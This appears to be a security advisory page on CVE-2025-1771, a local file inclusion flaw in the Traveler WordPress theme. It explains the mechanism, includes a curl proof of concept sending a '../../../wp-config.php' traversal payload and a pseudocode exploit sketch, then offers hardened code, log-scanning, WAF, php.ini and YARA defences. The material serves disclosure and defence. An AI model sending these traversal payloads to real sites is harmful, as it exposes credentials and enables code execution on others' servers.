How CVE-2025-1771 Works
The vulnerability is in the `hotel_alone_load_more_post` AJAX action of the Traveler theme (≤ v3.1.8), which builds a file path from the user-supplied `style` parameter without adequate sanitization. An attacker can supply traversal sequences (e.g., `../../../wp-config.php`) to make the theme include arbitrary local files. Because `include` executes PHP rather than displaying it, the impact splits two ways: non-PHP files are disclosed to the attacker (sensitive data, logs, system files), while any PHP file the attacker can point the path at, for example one previously dropped through a permitted upload, runs with the web server's privileges. The action is reachable without authentication, so no account is needed to exploit it.
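To make the mechanism concrete, the following is an added illustrative example, not the Traveler theme's actual source, showing the vulnerable pattern beside a hardened handler. The function bodies, the `layouts` directory and the layout names are assumptions for illustration; only the action name `hotel_alone_load_more_post` comes from the advisory.

```php
<?php
// Added illustrative example (not the Traveler theme's real code): a WordPress
// AJAX handler that turns the user-supplied "style" parameter into an include
// path. The directory and layout names are assumptions for illustration.

// VULNERABLE: the request value lands directly in the include path. A value of
// "../../../wp-config.php" resolves to a file outside the layouts directory,
// and because include() executes PHP, any PHP it finds runs server-side.
function vulnerable_load_more_post() {
    $style = isset( $_POST['style'] ) ? $_POST['style'] : 'grid.php';
    include get_template_directory() . '/layouts/' . $style;
    wp_die();
}

// HARDENED: accept only a fixed set of known layout names, append the extension
// ourselves, and confirm the resolved path is still inside the layouts directory.
function hardened_load_more_post() {
    $allowed = array( 'grid', 'list', 'masonry' ); // assumed layout names
    $style   = isset( $_POST['style'] ) ? sanitize_key( wp_unslash( $_POST['style'] ) ) : 'grid';
    if ( ! in_array( $style, $allowed, true ) ) {
        $style = 'grid'; // unknown value: fall back instead of trusting it
    }

    // Defense in depth: realpath() collapses any ".." and symlinks, so a result
    // that does not start with the layouts directory is rejected outright.
    $base = realpath( get_template_directory() . '/layouts' );
    $file = realpath( $base . '/' . $style . '.php' );
    if ( false === $file || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'invalid style', 400 );
    }

    include $file;
    wp_die();
}

// The "nopriv" hook is what exposes the action to unauthenticated visitors;
// the hardened handler is safe to register on both.
add_action( 'wp_ajax_nopriv_hotel_alone_load_more_post', 'hardened_load_more_post' );
add_action( 'wp_ajax_hotel_alone_load_more_post', 'hardened_load_more_post' );
```

The allowlist alone is sufficient once `sanitize_key()` has stripped everything outside `[a-z0-9_-]`; the `realpath()` prefix check is kept so that a later change to how `$file` is built cannot silently reintroduce traversal.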
DailyCVE Form
Platform: WordPress
Version: ≤ 3.1.8
Vulnerability: LFI
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation
1. Curl PoC:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" \
  -d "action=hotel_alone_load_more_post&style=../../../wp-config.php"
2. Metasploit-style sketch (pseudocode; this is not a published Metasploit module, and `malicious.php` stands for a file the attacker has already placed on the server):
# Pseudocode, not runnable as-is
module.exploit('wordpress/traveler_lfi') do |r|
  r.target_uri.path = '/wp-admin/admin-ajax.php'
  r.post_data = {
    'action' => 'hotel_alone_load_more_post',
    'style'  => '../../malicious.php'
  }
end
Detection
1. Log Analysis:
grep -E 'admin-ajax\.php\?.*action=hotel_alone_load_more_post.*style=' /var/log/apache2/access.log
Note that the PoC above sends its parameters in a POST body, which the access log does not record; this grep only catches the GET form of the request. To see POST parameters, enable request-body audit logging (for example ModSecurity's audit log) or inspect at the WAF.
2. WAF Rule:
# nginx: block traversal in the style parameter (query string only; POST bodies need a real WAF such as ModSecurity)
if ($args ~* "style=.*(\.\./|%2e%2e%2f)") { return 403; }
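The grep and WAF rule above match the literal `../` only. The following added PHP script, example code that is not part of the page or the theme, scans constructed Apache combined-format log lines for the affected action and flags `style` values that decode to a traversal, including percent-encoded and double-encoded forms. The IPs, timestamps and user agents in the sample are made up.

```php
<?php
// Added detection example (not from the page or the theme): scan Apache
// combined-format access log lines for admin-ajax.php requests that carry the
// hotel_alone_load_more_post action with a traversal sequence in "style".
// The query string is URL-decoded before matching so that %2e%2e%2f and the
// double-encoded %252e%252e%252f are caught as well as a literal ../.

// Constructed sample log lines; IPs, timestamps and user agents are made up.
$sampleLog = <<<'LOG'
203.0.113.10 - - [28/Mar/2025:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=hotel_alone_load_more_post&style=grid HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [28/Mar/2025:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=hotel_alone_load_more_post&style=../../../wp-config.php HTTP/1.1" 200 2330 "-" "curl/8.5.0"
203.0.113.12 - - [28/Mar/2025:10:01:15 +0000] "GET /wp-admin/admin-ajax.php?action=hotel_alone_load_more_post&style=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1802 "-" "python-requests/2.31"
203.0.113.13 - - [28/Mar/2025:10:01:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 2330 "-" "curl/8.5.0"
LOG;

// True when the value, after decoding, contains a ".." path segment or is an
// absolute path. parse_str() has already decoded once, so decoding up to two
// more times here covers double and triple encoding.
function has_traversal(string $value): bool {
    for ($i = 0; $i < 2; $i++) {
        $decoded = rawurldecode($value);
        if ($decoded === $value) {
            break;
        }
        $value = $decoded;
    }
    return (bool) preg_match('#\.\.(?:[\\\\/]|$)|^[\\\\/]#', $value);
}

// Returns one entry per suspicious request: ip, timestamp and the decoded style value.
function scan_access_log(string $log): array {
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client, ident, user, [timestamp], "METHOD target protocol"
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
            continue;
        }
        [, $ip, $ts, $method, $target] = $m;
        if (strpos($target, 'admin-ajax.php') === false) {
            continue;
        }
        // A bare POST carries its parameters in the body, which the access log
        // omits, so it cannot be judged here; only the query string is visible.
        $query = parse_url($target, PHP_URL_QUERY) ?? '';
        parse_str($query, $params);
        if (($params['action'] ?? '') !== 'hotel_alone_load_more_post') {
            continue;
        }
        $style = (string) ($params['style'] ?? '');
        if (has_traversal($style)) {
            $hits[] = ['ip' => $ip, 'time' => $ts, 'method' => $method, 'style' => $style];
        }
    }
    return $hits;
}

foreach (scan_access_log($sampleLog) as $hit) {
    printf("%-15s %s %s style=%s\n", $hit['ip'], $hit['time'], $hit['method'], $hit['style']);
}
```

Run it with `php scan.php` after pasting real log lines into `$sampleLog` or reading them from a file. The POST line in the sample is deliberately left undetectable: the access log has no body, so a POST-based probe only shows up in request-body audit logs or at the WAF, which is the coverage gap the earlier grep shares.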
Mitigation
1. Patch: Upgrade to Traveler Theme > v3.1.8.
2. .htaccess Restriction:
# mod_rewrite directives are not valid inside <FilesMatch>; match the URI in a condition instead.
# Query string only: this does not inspect POST bodies. The [NC] and [F] flags are the
# intended ones where the original shows "[bash]".
RewriteEngine On
RewriteCond %{REQUEST_URI} admin-ajax\.php$ [NC]
RewriteCond %{QUERY_STRING} style=.*(\.\./|%2e%2e%2f) [NC]
RewriteRule ^ - [F]
3. PHP Hardening:
# php.ini. allow_url_include only blocks remote (http://, ftp://) includes and is Off by
# default; it does not stop local traversal. open_basedir confines file access to the
# listed directories, which blocks escapes such as /etc/passwd but not files inside the
# site root itself.
allow_url_include = Off
open_basedir = /var/www/html:/tmp
# Equivalent Apache form for a single vhost (httpd.conf or the vhost file, not .htaccess):
# php_admin_flag allow_url_include off
# php_admin_value open_basedir "/var/www/html:/tmp"
Forensics
1. Timeline Analysis:
find /var/www/html -type f -name "*.php" -mtime -7 -exec ls -la {} \;
A legitimate theme or plugin update also touches PHP files, so compare the list against the update history; PHP files under wp-content/uploads have no legitimate reason to exist and should be inspected first.
2. YARA Rule:
rule traveler_lfi {
    strings:
        $s = "hotel_alone_load_more_post"
    condition:
        $s
}
Note that this string is present in the theme's own source, so the rule will match the legitimate Traveler files; it is only useful for finding copies of exploit scripts or captured requests, not for deciding whether a site is compromised.
References
NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-1771